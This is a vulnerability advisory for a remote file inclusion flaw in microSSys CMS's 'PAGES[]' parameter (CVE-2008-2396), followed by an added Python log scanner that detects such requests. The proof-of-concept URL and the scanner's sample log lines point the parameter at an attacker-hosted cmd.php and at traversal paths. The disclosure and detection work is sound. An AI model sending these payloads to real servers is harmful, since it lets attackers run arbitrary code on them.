
microSSys CMS "PAGES[]" Parameter Handling Remote File Inclusion Vulnerability

 

Release Date: 20/05/2008
Severity: Highly Critical
SecWatch Advisory: SWID1021238
Cause: Input validation error
Solution Status: Unpatched
Impact: Disclosure of system information; Execution of arbitrary code
Exploit Status: PoC Available
Access Vector: From remote
 
Affected Software: microSSys CMS 1.x
 
References: http://milw0rm.com/exploits/5651
CVE: CVE-2008-2396
Secunia: SA30264
Bugtraq ID: BID#29278

 

Description:

An input validation vulnerability in microSSys CMS has been reported, which can be exploited by remote users to disclose sensitive information and compromise a vulnerable system.

User-supplied input passed to the "PAGES[]" parameter in index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from external and local resources, such as arbitrary PHP code which will be executed by the target web service. The PHP code, including operating system commands, will run with the privileges of the target web service.

Note: Successful exploitation requires that "register_globals" is enabled.

 

Affected:

microSSys CMS version 1.5. Other versions may also be affected.

 

Proof of Concept:

Arbitrary File Inclusion:
http://[target]/index.php?1=lol&PAGES[lol]=http://[attacker]/cmd.php

 

Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.

Filter malicious characters and character sequences via an HTTP proxy or firewall with URL filtering capabilities.
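
The URL-filtering check suggested above, as an added example that is not part of the original advisory or of microSSys CMS: it flags requests whose "PAGES[...]" parameter carries a URL, wrapper or path, including percent-encoded forms. The value heuristics, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request target in an access log line
PAGES_PARAM = re.compile(r"^PAGES\[[^\]]*\]$")        # parameter named in the advisory
# Assumed heuristic: scheme/wrapper prefix, path traversal, absolute path, NUL byte
SUSPICIOUS = re.compile(r"(?i)^[a-z][a-z0-9+.\-]*:|\.\.[/\\]|^[/\\]|\x00")

def fully_decode(text, rounds=3):
    """Undo repeated percent-encoding (bounded) so %255B is treated like '['."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def suspicious_pages_params(request_target):
    """Return (name, value) pairs where a PAGES[...] parameter carries a file reference."""
    query = request_target.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = fully_decode(name), fully_decode(value)
        if PAGES_PARAM.match(name) and SUSPICIOUS.search(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Yield (line_number, hits) for each access log line to review or block."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        hits = suspicious_pages_params(match.group(1)) if match else []
        if hits:
            yield number, hits

# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [20/May/2008:10:00:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/May/2008:10:00:07 +0000] "GET /index.php?1=lol&PAGES[lol]=http://attacker.example/cmd.php HTTP/1.1" 200 312',
    '192.0.2.44 - - [20/May/2008:10:00:09 +0000] "GET /index.php?1=x&PAGES%5Bx%5D=..%2F..%2Fsome%2Ffile HTTP/1.1" 200 901',
    '192.0.2.51 - - [20/May/2008:10:00:15 +0000] "GET /index.php?q=PAGES[lol] HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(number, hits)
```

A filter like this is a stopgap while the application is unpatched; disabling "register_globals" removes the precondition the advisory states for exploitation.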

 

Credits:

Raz0r

 
